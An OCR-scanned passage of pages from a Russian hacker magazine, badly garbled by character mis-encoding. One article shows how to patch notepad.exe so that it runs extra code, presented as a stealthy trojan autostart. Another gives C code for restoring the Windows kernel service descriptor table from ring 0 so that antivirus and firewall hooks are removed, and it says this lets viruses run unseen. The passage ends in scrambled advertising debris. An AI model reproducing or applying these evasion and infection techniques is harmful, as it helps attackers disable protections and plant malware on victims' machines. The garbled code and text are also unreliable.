ние оригинальной ОІ_І_. Но, как ты понимаешь, между Ьедіп и епсі хакер 
может поставить свой код, который будет выполнен при ее загрузке. 
Можно не подменять оригинальный файл своим, а просто воспользо- 
ваться вирусной методикой — расширить последнюю секцию в РЕ-фай- 
ле, записать туда свой код, который будет запускать трояна и переда- 
вать управление на оригинальную точку входа (о внедрении кода в чу- 
жое приложение ты также можешь почитать в статье Крис Касперски в 
прошлом номере — прим. Горлума). Давай попробуем сделать это вруч- 
ную, чтобы получше разобраться в действиях хакера. Для этого возь- 
мем обычный блокнот (поіерасі.ехе) из ѴѴіпбоѵѵз ХР и попробуем допи- 
сать в него код, который будет запускать калькулятор. 

Для начала откроем файл в Нех ѴѴогкзЬор (или любом другом НЕХ-ре- 
дакторе) и добавим в его конец ЮООЬ байт нулей. 

Затем откроем файл в РЕ Тооіз и нажмем кнопку Зесііопз, находим в 
списке последнюю секцию (в данном случае это будет .гзгс) и увеличи- 
ваем ее ѴігІиаІЗіге и ВаѵѵЗіге на 1000. Далее нам нужно переопределить 
точку входа РЕ-файла на выделенную область. Для этого посмотрим 
смещение этой области в файле (в Нех ѴѴогкзЬор) и нажмем в РЕ Тооіз 
кнопку ЕЮ, где нам нужно пересчитать полученный Рііе ОІІзеІ в Веіаііѵе 
Ѵігіиаі Асісігезз. У меня получилось значение 13А00. Жмем кнопку 
Орііопаі Неабег, где меняем точку входа (Епігу Роіпі) на полученное зна- 
чение. Перед этим нужно сохранить старую точку, так как она нам еще 
понадобится. Потом жмем кнопку "?" рядом с 
ЗігеОІІтаде, чтобы пересчитать размер РЕ- 
файла (без этого он не будет запускаться). 

Теперь нам понадобиться отладчик ОІІуОЬд, где 
мы будем писать код, запускающий блокнот. 

Откроем файл в отладчике и остановимся на но- 
вой точке входа — с этого адреса мы будем раз- 
мещать код. Данные будем размещать немного 
ниже. Для запуска калькулятора нам нужно сос- 
тавить примерно следующий код: 

ризіі оТІзеІ: 'кегпеІ32.сІІГ 
саІІ ѲеШІосУеНапсІІеА 
ризіі оіізеі 'ѴѴіпЕхес' 
ризіі еах 

саіі ОеІРгосАсісІгезз 
ризіі 1 

ризіі оТТзеІ: 'саіс.ехе' 
саіі еах 



нас находится по адресу 1001000. 
Находим это место в отладчике и за- 
писываем адреса. У нас должно по- 
лучиться что-то вроде этого: 

010010СС — беШІосМеНапШеА 
01 001 1 1 0 — ОеІРгосАсісІгезз 




Создание троянов, вообще 
говоря, можно назвать не- 
законным действием, поэ- 
тому никогда и ни за что 
не создавай их. Это дурная 
затея. Пей лучше молоко и 
играй в компьютерные иг- 
ры. Вот, кому-то контра 
нравится, и ничего - жи- 
вут, вредоносных прог- 
рамм не пишут ;). 



Теперь можно разместить нужные 
нам строки в выделенной области и 
составить код загрузчика. В конце 
загрузчика должна стоять команда 

перехода на оригинальную точку входа. После того, как твой код стал за- 
пускаться, нужно записать его в файл при помощи Нех ѴѴогкзЬор. 

На диске с журналом ты найдешь пропатченный блокнот, который за- 
пускает калькулятор. Подобный метод автозапуска трояна при правиль- 
ном его применении может быть весьма и весьма незаметен. 

[как найти свой метод автозапуска] Настоящий, действительно 
рубящий в теме хакер, никогда не станет пользоваться ничем вышеопи- 
санным и вообще чем-либо ранее известным. Он обязательно придумает 
какой-нибудь оригинальный метод для автозапуска своего творения. Как 
он это сделает? Скорее всего, для начала откроет гедесііі и поищет по все- 
му реестру параметры по маске *.ехе;*.сІІІ. Посмотрев найденные разделы 
и подумав немного головой, он легко найдет место, куда есть возмож- 
ность прописать трояна. Если ему покажется этого мало, то он взглянет, 
какие процессы запущены и какие ОН загружены в системе и попытает- 
ся определить причину загрузки каждого файла, чтобы что-нибудь да и 
подменить. В общем, способов автозагрузки он сможет придумать еще 
очень много, нам остается только быть более бдительными © 



Для начала нужно определить адреса нужных нам 
функций в таблице импорта. Таблица импорта у 
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На диске ты сможешь от- 
копать все сорцы к статье. 
На диске к журналу, конеч- 
но. На какому-нибудь ле- 
вом, купленном на радио- 
рынке, ты всего этого не 
обнаружишь. 
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Смерть защитам 

УХ, ТЫ БЫ ЗНАЛ, КАК МНЕ НАДОЕЛИ ВСЕ ЭТИ 
ЗАЩИТЫ. АНТИВИРУСЫ, ФАЙРВОЛЫ ВСЯКИЕ. 
ФУ! В ПЕЧЕНКАХ УЖЕ СИДЯТ. СТОИТ ОДНОМУ 
МОЕМУ ПРОЦЕССУ МОДИФИЦИРОВАТЬ ДРУ- 
ГОЙ, ТАК ОНИ СРАЗУ ОРАТЬ НАЧИНАЮТ И В 
ИНТЕРНЕТ НЕ ПУСКАЮТ, А ВО ВСЕХ ОТНОСИ- 
ТЕЛЬНО БЕЗВРЕДНЫХ ХАКЕРСКИХ ПРИЛОЖЕ- 
НИЯХ ОНИ ВИДЯТ ВИРУСЫ — КОШМАР! ЭТОМУ 
ДОЛЖЕН ПРИЙТИ КОНЕЦ. НАДО ОТУЧИТЬ ДУ- 
РАЦКИЕ ЗАЩИТЫ ОТ ИХ ИДИОТСКОЙ ПРИВЫЧ- 
КИ ПОРТИТЬ ЖИЗНЬ НОРМАЛЬНОМУ ДОБРО- 
ПОРЯДОЧНОМУ ХАКЕРУ. ЧТО Ж, ЭТИМ И ЗАЙ- 
МЕМСЯ I Николай «догі» Андреев (догІит@геаІ.хакер.ш) 



Отучаем персональные 
защиты от вредных привычек 

Я тут провел некоторые исследования, посидел с отладчиком и дизассе- 
мблером и пришел к выводу, что подавляющее большинство всех персо- 
нальных защит для ѴѴіпсІоѵѵз основано чуть ли не на хакерском принци- 
пе! Ну, по крайней мере, именно за счет него многие современные троя- 
ны прячутся от глаз чересчур любопытного пользователя (подробнее об 
этом читай в статье «Программа-невидимка» в мартовском номере). Да, 
ты правильно понял, я говорю о перехвате АРІ. Защиты перехватывают 
некоторые важные, по мнению разработчиков, системные функции и 
следят за тем, чтобы с их помощью хакер не мог сделать какую-нибудь 
гадость. Препятствуют запуску вирусов, не пускают в сеть процессы с 
внедренным троянским кодом и т.п., в общем, пытаются навести порядок 
путем постоянного мониторинга важных системных событий. 

Взять, к примеру, замечательный персональный файрвол АдпіЩт 
Оиірозі. Начиная, если я не ошибаюсь, с версии 2.5, для того чтобы пре- 
дотвратить обход с помощью внедрения и запуска кода в адресном 
пространстве доверенного приложения (подробнее о нем читай в статье 
«Клизма файрволу» в Хакере за декабрь 2004 года), он перехватывает 
низкоуровневую часть системного события модификации памяти про- 
цесса, функцию ЫІѴѴгіІеѴИиаІМетогу. Если вдруг троян внедрит свой 
код, например, в іехріоге.ехе, аутпост мгновенно на это дело отреагиру- 
ет, запретив модифицированному браузеру вылезать в сеть. Тут имеет 
место только один перехват, зато какой противный! Древний, как 
ѴѴіпсІоѵѵз 2000, способ обхода файрвола обламывается и целая туча 
приватных троянов, его использующих, летит в тартарары. 

Или, другой пример — до коликов любимый вирмейкерами Антивирус 
Касперского. В плане перехватов — это просто монстр! Он коверкает аж 
9 не самых последних Ыаііѵе АРІ функций, среди которых есть 
ЫЮгеаІеРгосезз для слежения за запуском приложений (вернее, за за- 
пуском вирусов) и даже ЫЮрепРгосезз для предотвращения хакерско- 
го вмешательства в работу антивирусного монитора (АѴР просто не 
даст открыть собственный процесс). 

А теперь представь, что у нас появилась возможность лишить все эти и 
многие другие персональные защиты их перехватов. Представь: АѴР 
прекращает следить за вирусами, Оифозі не блокирует больше моди- 
фицированный трояном браузер, какой-нибудь 2опеА1агт на макси- 
мальном уровне безопасности молчит о каждом запускаемом неизвест- 
ном приложении, таким образом, любая защита, мониторящая систему, 
вдруг затыкается. Не прекращает работать, не вываливается с сообще- 
нием об ошибке, а просто замолкает. Ни тебе вирусных предупрежде- 
ний, ни файрвольных ругательств — звучит неплохо, правда? 

Вот только возможность эту не так просто получить. Ты, наверное, уже за- 
метил, что все защиты, о которых я говорил выше, перехватывают Ыаііѵе 
АРІ — в этой неприятной тенденции и кроется основная проблема. Дело в 
том, что ни одна уважающая себя защита не станет перехватывать какое- 
нибудь системное событие на пользовательском уровне. Она постарается 




максимально усложнить жизнь хакеру, а, следовательно, будет делать все 
исключительно на уровне ядра, где не ступала еще нога юзера без прав ад- 
министратора. А от перехвата на уровне ядра избавиться на порядок слож- 
нее, чем от обычной подмены записи в таблице импорта или сплайсинга 
функции в изег тобе. Сложнее, но ведь для нас нет ничего невозможного! 

[перехват АРІ в кегпеі то сіе] За некоторым системным событием 
можно следить на разных этапах его развития. Да, хорошо сказал. На 
примере, думаю, будет понятнее. Есть, скажем, событие модификации 
памяти одного процесса другим. Для обхода файрвола мы вызывали его 
с помощью функции ѴѴгіІеРгосеззМетогу. Защита может перехватить 
функцию, и этого будет достаточно, чтобы предотвратить хакерскую де- 
ятельность. Однако кодеру ничего не будет стоить в изег тобе этот пе- 
рехват обойти. Защита также может перехватить Ыаііѵе АРІ функцию 
ЫІѴѴгііеѴігІиаІМетогу, экспортируемую библиотекой пібІІ.бІІ, но и этот пе- 
рехват будет осуществляться на пользовательском уровне, а, следова- 
тельно, будет ненадежен. Поэтому разработчики защит предпочитают 
реализовывать перехват на уровне ядра. Пишут драйверы и тихо-мирно 
подменяют адреса Ыаііѵе АРІ функций в Зегѵісе Эезсгіріог ТаЫе (если ты 
еще не знаешь, что такое ЗЭТ или недостаточно знаком с механизмом 
работы низкоуровневой части ѴѴіпсІоѵѵз, очень советую почитать книгу 
Свена Шрайбера «Недокументированные возможности ѴѴіпсІоѵѵз 2000», 
статьи с ѵѵѵѵѵѵ.гооікіі.сот, а также статью тз-гет'а «Перехват АРІ-функ- 
ций в ѴѴіпсІоѵѵз 2000. Нулевое кольцо»). Это очень легко делается, фак- 
тически в одну строку (естественно, перед заменой элемента в таблице 
надо не забыть сбросить ѴѴР Ьіі и запретить прерывания): 

// сначала определяется простенький макрос 
#сІеТіпе ЗѴЗТЕМЗЕВѴІСЕ(_ІипсІіоп) КеЗегѵісеОезсгірІогТаЫе-> 
п105кгпІ.ЗегѵісеТаЫе[*(РІЛОМ6)((РІІСНАВ)_ІипсІіоп+1)] 

// и производится замена 

ЗѴЗТЕМЗЕВѴІСЕ(№ШІеѴігІиаІМетогу) = №ѵѵ№ШІеѴігІиаІМетогу; 

КеЗегѵісеЭезсгірІогТаЫе — это экспортируемый ядром указатель на 
ЗЭТ, структура которой содержится в таблице системных сервисов, из 
которой в конечном счете берутся адреса функций ІМаІіѵе АРІ. 

[структуры ЗЭТ и ЗЗТ] 

іуресІеТ зігисі _ЗЕВѴІСЕ_0ЕЗСВІРТ0В_ТАВІ_Е 
{ 

Р1МТРВ0С ЗегѵісеТаЫе; 

РЭТОВЭ СоипІегТаЫе; 

ІА(Ж ЗегѵісеЫтіІ; 

РВУТЕ АгдитепІТаЫе; 

} ЗЕВѴІСЕ_0ЕЗСВІРТ0В_ТАВІ_Е; 

Чтобы получить номер ячейки в ЗЭТ, в которой будет содержаться адрес 
перехватываемой ІЧайѵе АРІ-функции на уровне ядра, нужно всего лишь 
прибавить к адресу функции-переходника с тем же именем из пібіі.біі 
единичку и взять по полученному адресу значение. Наверное, тебя инте- 
ресует, откуда там возьмется этот номер? Все очень просто. Давай, ди- 
зассемблируем любую Ыаііѵе АРІ функцию, экспортируемую пібІІ.бІІ: 

[функция МѴѴгіІеѴігІиаІМетогу из пІсІІІ.сІІІ] 

В8 15 01 00 00 тоѵ еах, 1151л 

ВА 00 03 РЕ 7Р тоѵ есіх, 7РРЕ0300І1 

РР 12 саІІ сіѵѵогсі ріг [есіх] 

С2 14 00 геШШ 

Первый байт кода функции — это опкод инструкции МОѴ еах,ітт32. Четыре 
следующие за ним байта — это, собственно, ітт32, то есть данные, запихива- 
емые в регистр еах, то есть индекс функции в ЗЭТ. И так для всего ІМайѵе АРІ. 
Естественно, подмена записей в ЗЭТ — это далеко не единственный 
способ перехвата на уровне ядра. Можно патчить функции прямо в 
піозкгпі.ехе, можно перехватывать зузепіег, можно даже создать свою 
таблицу ЗЭТ и подменить КеЗегѵісеЭезсгірІогТаЫе, однако все это не 
необходимый геморрой для разработчиков защит, поэтому они ограни- 
чиваются одним самым банальным способом. Зря. Сейчас я покажу, как 
просто хакеры избавляются от подобного перехвата. 

[убираем перехваты в кегпеі тосіе] 

Чтобы убрать перехват, реализованный подменой записи в ЗЭТ, требует- 
ся найти оригинал таблицы и обратить подмену. Естественно, в изег тобе 
всего этого сделать не удастся. Ну, найти все адреса еще может быть, а 



вот заменить адрес на старый — нет, тут придется спускаться в гіпдО. Хо- 
рошо, что мы это уже умеем делать и у нас даже есть нормальная, рабо- 
тающая функция (она прилагалась к моей статье «Абсолютный ноль» 
в декабрьском номере Хакера за 2004 год). Итак, первое, что мы сдела- 
ем, — загрузим свою копию ядра и найдем в ней ЗЭТ. Ядро — это обыч- 
но піозкгпі.ехе, однако в ЬооЫпі может быть прописан и другой файл, по- 
этому не следует ориентироваться на одно известное имя, лучше грамот- 
но его получить с помощью ІЧайѵе АРІ функции ЫЮиегуЗузІетІпІогтайоп, 
экспортируемой пібіі.біі. 

ІМТЗТАТЕІЗ (ѴѴІЫАРІ * _ШиегуЗузІетІпІогтаІіоп) 

(ШІМТ, РѴ0Ю, Ш_(Ж, РШ_(Ж); 

НМСЮШЕ ііпісііі = ОеШосІиІеНапсіІеС'пІсІІІ.сІМ"); 

*(РАВРВ0С *)8Ц\ІЮиегуЗузІетіпІогтаІіоп = Ѳе1;РгосАсІсІгезз( 
ііпісііі, 7ѵѵОиегуЗузІетІпІогтаІіоп м ); 

ЭѴѴ0РЮ гс=_ЫЮиегуЗуз1;етІпТогта1:іоп( 
ЗузІетМосіиІеІпІогтаІіоп,рМосІиІе5,4,&сі\А/МеесіесіЗі2е); 

іі (гс==ЗТАТиЗ_ІЫР0_ІЕЫеТН_МІЗМАТСН) 

{ 

МосІиІе5=(РМООІЛЕЗ)ѲІоЬаІАІІос(СіРТР,сІ\л/ЫеесІесІЗі2е); 

гс=^ЮиегуЗузІетІпІогтаІіоп( 

Зуз1:етМосІиІеІпТогта1:іоп,рМосІиІе5,сІ\л/ЫеесІесІЗі2е,ЫІІІІ); 

} 

еізе геіигп РАІ.ЗЕ; 
і! (!ЫТ_ЗиССЕЗЗ(гс)) геіигп РАІ_ЗЕ; 

// адрес ядра 

ЭѴѴ0РЮ сіѵѵКегпеІВазе = (ОШВО)рМосМе5->5пйВазе; 

// адрес имени файла ядра 

РСНАВ рКегпеІЫате = рМосіиІе5->зті.МосіиІеМатеОІІ5еІ 
+ рМосіиІе5->5ті.ІтадеІ\Іате; 

Отлично, теперь у нас есть имя файла, и мы можем загрузить свою ко- 
пию ядра. Делается это также как и с обычной ОН, только с предупреж- 
дением системы, что не нужно грузить ОІІМаіп: 

// ООЫТ_РІЕЗОІ_ѴЕ_ОІ_І__Р{ЕРЕВЕІ\ІСЕЗ — не грузим йІІМаіп 
РІМСЮШЕ ііКегпеІ = ЕоаШЬгагуЕх(рКегпе11\1ате,0, 
ООІ\ІТ_ВЕЗОІ_ѴЕ_ОІ_І__ВЕРЕВЕІ\ІСЕЗ); 
іі (ФКегпеІ) геіигп РАЕЗЕ; 

Теперь в полученной копии ядра найдем смещение адреса ЗЭТ. Само- 
го адреса там не окажется, так как переменная КеЗегѵісеЭезсгірІогТаЫе 
не была инициализирована, но смещение нам пригодится, чтобы этот 
адрес найти в гуще кода ядра. 

ІІ (! (сіѵѵКЗОТ = (ЭѴѴОВО)ЗеІРгосАсісіге55(ііКегпеІ, 
"КеЗегѵісеОезсгірІогТаЫе"))) 
геіигп РАІ.ЗЕ; 

сіѵѵКЗОТ = (ОѴѴОВО)ііКегпеІ; 

іі (І(сІѵѵКіЗегѵісеТаЫе = РіпсіКіЗегѵісеТаЫе(ііКегпеІ, сіѵѵКЗОТ))) 
геіигп РАЕЗЕ; 

РіпбКіЗегѵісеТаЫе — это офигенная функция, написанная кодером 90210 
и запощенная на ѵѵѵѵѵѵ.гооікіі.сот в его статье об антихукинге на уровне 
ядра. Эта функция возвращает смещение ЗЭТ относительно начала мо- 
дуля ядра. Она ищет в ядре инструкцию формата тоѵ [тет32], ітт32. 
Если быть точным, инструкцию тоѵ б5:_КеЗегѵісеОезсгірІогТаЫе.Вазе, 
оіізеі _КіЗегѵісеТаЫе из функции КіІпііЗузІет. Поиск ориентируется на 
смещение КеЗегѵісеЭезсгірІогТаЫе, полученное в результате проведен- 
ных выше манипуляций. 

[функция РіпсіКіЗегѵісеТаЫе] 

0ѴѴ0В0 РіпсіКіЗегѵісеТаЫе(НМ00ЕІЕЕ ШосіиІе,ОѴѴОВО сіѵѵКЗОТ) 

{ 

РІМА6Е_РІЕЕ_НЕА0ЕВ рііі; 

РІМА8Е_0РТІ0ЫАЕ_НЕА0ЕВ роіі; 

РІМА6Е_ЗЕСТІ0Ы_НЕА0ЕВ рзіі; 

РІМА8Е_ВАЗЕ_ВЕЕ0САТІ0Ы рЬг; 

РІМАС1Е_РІХЕІР_ЕЫТВУ ріе; 

0ѴѴ0В0 сіѵѵРіхирз = О, 
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і,сІ\А/РоіпІегРѵа,сІ\А/РоіпІ8ТоВѵа,сІ\л/Кі5егѵісеТаЫе; 

В001_ ЬРігзІСІіипк; 

6е1:Неас]ег8((РСНАВ)ІпМосІиІе,&рТІп,&роІл,&р5Іп); 
іі ((роИ-> 

ОаІаОігеоІогу[ІМА6Е_ОІВЕСТОРУ_ЕМТВУ_ВАЗЕРЕЮС].ѴіПиаІАсісігезз) 
&& (!((рИі->СИагайегі5ІіС8)&ІМА6Е_РИЕ_РЕ10СЗ_ЗТРІРРЕ0))) { 
рЬг=(РІМА6Е_ВАЗЕ_ВЕІОСАТІОЫ)ВѴАТОѴА(роИ-> 
0ага0ігесЮгу[ІМАѲЕ_0ІРЕСТ0РУ_ЕМТВУ_ВА8ЕРЕЮС].ѴіПиаІАс]с]ге88, 
Шосіиіе); 

Ь Рі гзЮ И и п к=ТР II Е ; 

ѵѵЫІе (ЬРігзІСІіипк II рЬг->ѴігІиаІАс1сІгез8) { 

ЬРіг8ІСІіипк=РАІ_ЗЕ; 

рІе=(РІМА0Е_РІХІІР_ЕМТР\У)((0Ѵ\/0Р\0)рЬг + 
8 І 2 еоІ(ІМА 6 Е_ВАЗЕ_РЕШСАТІОМ)); 

Тог (і=0;і<(рЬг->ЗігеОТВІоск - 
8ІгеоТ(ІМАѲЕ_ВАЗЕ_ВЕЮСАТІОЫ))»1 ;і++,рТе++) 

{ 

і! (рТе->Туре==ІМАѲЕ_ВЕІ_ВАЗЕО_НКЗНЮѴѴ) { 
сІ\л/Ріхир8++; 

сІѵѵРоіпІегРѵа=рЬг->ѴігІиаІАсІсІге83+рІе->оІІзеІ; 
сІ\л/РоіпТзТоВѵа=*(РО\Л/ОВО)((ОѴѴОВО)ИМосІиІе + 
сі\л/РоіпІегВѵа)-(ОѴѴОВО)роІі->ІтадеВазе; 
іі (сІ\л/РоіпТзТоВѵа==сІ\л/КЗОТ) 

{ 

іІ(*(РѴѴОРЮ)((ОѴѴОРЮ)ііМосіиІе+с]\А/РоіпІегРѵа-2)==Ох05с7) 

{ 

сІ\л/КіЗегѵісеТаЫе=*(РО\Л/ОВО)((ОѴѴОВО)ИМосІиІе + 
сі\л/РоіпІегВѵа+4) - ро!і->ІтадеВазе; 
геіигп йѵѵКіЗегѵісеТаЫе; 

} 

} 

} 

} 

*(Р0ѴѴ0РЮ)&рЬг += рЬг->ЗІ 2 еОІВІоск; 

} 

} 

геіигп 0; 



Получив смещение ЗОТ, мы прибавляем его к базе нашей копии ядра — 
это и будет адрес оригинальной таблицы. На всякий случай копируем 



все содержимое ЗОТ в собственный массив ОѴѴОРЮ и радуемся — 
основное дело сделано, оригинал получен. 

6еІРІеасіегз((РСРІАРІ)ІіКегпеІ,&рІІі,&роІі,&рзІі); 

рЗегѵісе = (Р0ШРЮ)((0ѴѴ0РЮ)ІіКегпеІ + сіѵѵКіЗегѵісеТаЫе); 

Іог (рЗегѵісе=(Р0\А/0В0)((0ѴѴ0В0)ІіКегпеІ+сІ\л/КіЗегѵісеТаЫе); 
*рЗегѵісе-роІі->ІтадеВа 8 е<роІі->Зі 2 еОІІтаде; 
рЗегѵісе++,сІ\А/Зегѵісез++) 

ТАВІЕ[сІ\л/Зегѵісез] = *рЗегѵісе — роІі->ІтадеВазе+сі\А/КегпеІВазе; 

ЫЕѴѴТАВІЕ = (0ѴѴ0В0)(сІ\А/КегпеІВазе + сіѵѵКЗОТ); 

Теперь, перейдя в кегпеі тобе, можно либо восстановить ЗОТ, просто 
заменяя все адреса в текущей таблице на адреса, только что получен- 
ные, чтобы убить все защиты, либо использовать эти самые адреса нап- 
рямую, чтобы обойти перехват. В плане обхода ЫІѴѴгіІеѴИиаІтетогу 
восстановить проще, использовать адреса напрямую менее палевно. 
Напрямую — значит запускать функцию по полученному адресу прями- 
ком из гіпдО. 

Короче, давай отключим все защиты. 

[восстанавливаем ЗйТ на уровне ядра] 

ѵоісі ІпКегпеРгос() 

{ 

Іог (іпі і = 0; і < сІѵѵЗегѵісез; і++) 
((0ѴѴ0Р0*)(*(0ѴѴ0РЮ*)(ЫЕѴѴТАВІЕ)))[І] = ТАВІ_Е[і]; 

} 

Запусти эту функцию на уровне ядра. Хочешь — инжектируй код в бра- 
узер, чтобы обойти файрвол — никто тебе ничего не скажет. Хочешь — 
вирусы запускай. В общем, все защиты засыпают. Неплохо, да? И это 
ведь еще не все применение антихукинга на уровне ядра. С его же по- 
мощью можно бороться с крутыми ядреными руткитами. Можно отру- 
бать какие-нибудь хитрые антиотладочные приемы. В общем, примене- 
ние, помимо банального отрубания защит, ты найдешь. 

Полный исходный код программы, отрубающей все защиты и обходя- 
щей файрволы, ты можешь найти на диске, очень советую тебе в нем 
как следует покопаться. 

На этом я заканчиваю свое повествование. Если возникли какие- 
нибудь вопросы — пиши, постараюсь все объяснить. Удачного 
компилирования 0 






'ггасігіГкіііі ] ЖНдпГ 



1 | і ;: л | ■■ 



0^пгіі.ік± 


■гЙИПЕ- 


^ рѵтѵтГіЛ" 


гьмшм 


ПУлѵ&ЛгЯКѣ 


Е1ГІПИЛ. 


Не. 


Ок РсЛГЫі 


0 ’-лішіЪі .-в*ѣ- 


ігЙКР№ 


0 і4 >!і Сі ІІ а ■ 


іЪ7і:ЧІ=йі 


□ЛнШНМік 


*!ПЧШГ 




ІІО'СЭТ-'Е-Щ 


□ лнкі пЪ=Ь 


ч.еР;НГІГ- 


Чг.уРп-_к ■ 


^адітм 


ИУіиА+якЬ 


ЩПНС.І.ІГ 


Мно4ін 


аоѵ?іги:ч 


□ 'мівгіЬгі лѴи~ 


^-ЕНГІД? 




іЪ7еЙПГ4Л 


ГѴчѵПАмЬМ.. 


ьмйь-а. 


3«АЬ9|іі№0і 


ОйЫіМЙП 


П "ЛІІІІ пЧг 


іррше;із? 


йгН-Гіі.- 


іЪ7с=ІІ|:=Аі 


□ ‘■ЛМЙЛ-йПСЙ- 


ЙЙНСцН. 


1інуб(!г4с 


СЬМСПМ 


й^іііЁк і АЬі 


трннриіг 


гг^тГіЛі 1 


іьтоіііан 


□Ліі-ЛУ-іѵісМ 


«ПНШІ 


□е^-зіН-ГЮГ 


ІЬ:Лс7ШЗСЛ 



С 'і\^М П ПТигёЛі |гІ птЛ ч і іі I Л 

с и Ош№н і і,^ігт.:г'л:.л -а 

С '.Ѵа- МГіГГ^^і|л!т.Ѵ--ліа іі 

С 

Г. ѴМН р р* 1 .1 

С а 

с^алнп^лігйіп яьяят 

с 

с й и*гл і>й«тй^і*л -а 

С П Г№ =,■□ і 1 1 Л 

с 'мч* и п*"- и щіийЕмл ,* 



I Г— ін-лЬН-лПіи 



■Т^сгісі] ОіЛПІ 






1 Р-Ж^-Рлі 


^ >^'Ч^10Е^’Ср 


іИг_мі_гт^ 


ІШйіпггв 


і ь ?-етЛ г -іі;о!Иті-а« 


ІгП Ѵ : ,і -І-, =,-Г 


Ул Г Ь і : г 


ГЫГЪН?.ГГ 


'■Еі'іПііт^іж^ і>і|<:ІпаЗ/' І иѣптгі І ^іУ ѵ 


Ігйіазиіі^Ш 




[ЬЕНІТЗІ 


^^|ІііЧ№-^ІІтЗГЛт«ГіЧ Н.І 


фытші-.нкі. гЬГ 


№"_ГТТ^ тФ\ 1 ■ ПіР I 




'■^:Ігі^іві^ит1 , ЛіЬіѵтч , і І >і У ^ 










І.гі1"і; : іі э і:. г:Т 


^ТіргіпТіішсІ 




'і = г^ІРі^5аі\^^Іпт'ЗГ л иѣгѵгі в 


ІгШ'іг.мм-.ОІ 


І№іІ^сиЕ 


ішн 


^ 1 1 Н*1 1 1 № Е\Й ГМГ 1 4 ІЙ . ! 




І-Й лН )Р< ■ >иЬ:а Гг 




і Гі|ПІ ггЛ Гіі" 1 і с і н 1 1 т"і]' , и Ь ГіТЛ 'Ыі У ■ 


1г4іги і .;кчгі_р_;4. 


Мг'і ^ N уъ&оМ 1 ос-е а : 


імгнмі 


^■Іі^№4іЫ№іУ«1й с 


Іклаліягч. ГгТ, 


ІГТ пеггі гР>аді 




1 і Гі'.п 1 гг Рі 1 1 Ч '-^ітпі п і Ь і'ітт : V 1 . и = 


ІніЙЗЙНЖ-М 




№Ш) 


^1гуІІІІ^І[Н^^|ІЕПІ2^Г№4ІІ .1 


Хгіі г : ,| =1і тЬР 






Ѵ^/:ІагЛіві^5г^пэ2і Ч иЬгѵіті ! іІ!іУ с 


Ініизшіі^си; 




ІМШЕсАі 


^ІІІГІІ^^ІІт^ЛікіѴѴіѴгкІ.! 


ф.т :ш:нкЁ. е>г 




вдл.п 


Ѵ^Ііп-ЙівгіѴ^|г1гпЗ?^іЬгѵіті4іУ н 



-У ІсгаиП СЧі ѵ* к- р— 4 пѵІгогѵтнкмР | Й#л-І*п| гтмігксрр" 



№ № № г™* |« 

I? ■ в I д іЫі— — с. щ , 

!Д V ^ | ^ ^ | ♦ Ч, »* *■ - 

ЬфѴйІіЬ? ш ^ ,41 і Ш 1 I 

Иг, ш*Н. іЬр и- <? | п 1 "= , 4 " I Г 

I 

■^1 1 ■ 1 1 Сч Ь+ъшт э !■ I 1 рГМм ІчИю- 1 1 

ІкиНЩі 

сЪлі ЬиЖІвЛ і| і 

ясве! I Е еі ,0 # ± 

« I <Ы ЕѵС — ПІР ЩЕ I "Ь іТ Р I 7/ ѴІТ в У Д . ! І й- ". 1 

1 

Бргввді-Рііч ТО-ПРР ЧТО м те+ѵпу* 1 
Р* - ■■-І-Р-Г'Г. - ід л г. , I Р ( РКІ іи*1 = I 

I 

сЧрг Т.“лпец|гПіі-і | й , "Пііи Сш.жгр іяГіііэтгт 

С4±ш=в ■3^ 



Ѵ ѵі гі 2 I . К + 1 1 . Ь Р ^ V ■ I 

4 

іфг і іті^ ь ■ 5 ? ѵ * і**І 

Й і 4 I &-КЗЛ0 ■ | ЙГт*Ш:> 1 | ИЗ - 

1 







■ Іі.і т іі.імгпі + і№-^ пііш-гіагг а-ті 



ѴІСЕ засекает перехваты Антивируса Касперского 



обход файрвола - это дело 9 Кб кода 








Хочешь фирменный лого на свой сотовый? 



Хочешь узнать, что значит термин? 




Іодробности: ѵѵѵѵѵѵ.Нгее.ги, (095) 916-7253, (812) 118-4575, зиррогШИгее.ги. Для • 
югласно твоему тарифному плану). Проверить возможность закачки можно, за 
юддержки твоего оператора. Стоимость запроса на номер 4444 - $0,30 без учета 
учета налогов, на номер 4449 - $3,00 без учета налогов. В с: 



Пришли код логотипа (к примеру, "1001") на номер 



драйвер 

компилятор 

дескриптор 



идентификатор 



брандмауэр 



кеилоггер 



отладчик 

эмулятор 



редирект 



оболочка 



мультифид 



сплиттер 






Пришли код термина (к примеру, "ѵѵОООІ") на номер 



(код ѵѵОООІ) 
(код ѵѵ0002) 
(код ѵѵОООЗ) 
(код ѵѵ0004) 
(код ѵѵ0005) 
(код ѵѵОООб) 
(код ѵѵ0007) 
(код ѵѵ0008) 
(код ѵѵ0009) 
(код ѵѵООЮ) 
(код ѵѵООІІ) 
(код ѵѵ0012) 
(код ѵѵООІЗ) 
код ѵѵ0014) 
(код ѵѵ0015) 
(код ѵѵООІб) 
(код ѵѵ0017) 
(код ѵѵ0018) 
(код ѵѵ0019) 
(код ѵѵ0020) 
(код ѵѵ0021) 
(код ѵѵ0022) 
(код ѵѵ0023) 
(код ѵѵ0023) 
(код ѵѵ0025) 
(код ѵѵ0026) 
(код ѵѵ0027) 
(код ѵѵ0028) 
(код ѵѵ0029) 
код ѵѵООЗО) 
(код ѵѵ0038) 
(код ѵѵ0040) 
(код ѵѵ0041) 
(код ѵѵ0042) 
(код ѵѵ0043) 
(код ѵѵ0044) 
(код ѵѵ0045) 
(код ѵѵ0047) 
(код ѵѵ0048) 
(код ѵѵ0049) 
(код ѵѵ0050) 
(код ѵѵ0051) 
(код ѵѵ0052) 
(код ѵѵ0053) 
(код ѵѵ0054) 
(код ѵѵ0055) 
(код ѵѵ0056) 
(код ѵѵ0057) 
(код ѵѵ0058) 
(код ѵѵ0059) 
(код ѵѵООбО) 
(код ѵѵООбІ) 
(код ѵѵ0062) 
код ѵѵООбЗ) 
(код ѵѵ0064) 
(код ѵѵ0065) 
(код ѵѵООбб) 
(код ѵѵ0067) 
(код ѵѵ0068) 
(код ѵѵ0069) 
(код ѵѵ0070) 
(код ѵѵ0071) 
(код ѵѵ 0072) 
(код ѵѵ0073) 
(код ѵѵ0074) 
(код ѵѵ0075) 



маршрутизация 
шина 
интерпретатор 
окружение 
кластер 
степпинг 
трафик 
транслятор 
верификатор 
спам 
офшор 
крякер 
бета 
скин 
сертификация 
аутсорсинг 
баннер 
локализация 
тестер 
дамп 
стек 

исключение 
мидлет 
обфускатор 
документация 
поток 

хэширование 
браузер 
инсталятор 
реестр 
аккаунт 
домен 
девелопер 
Флуд 
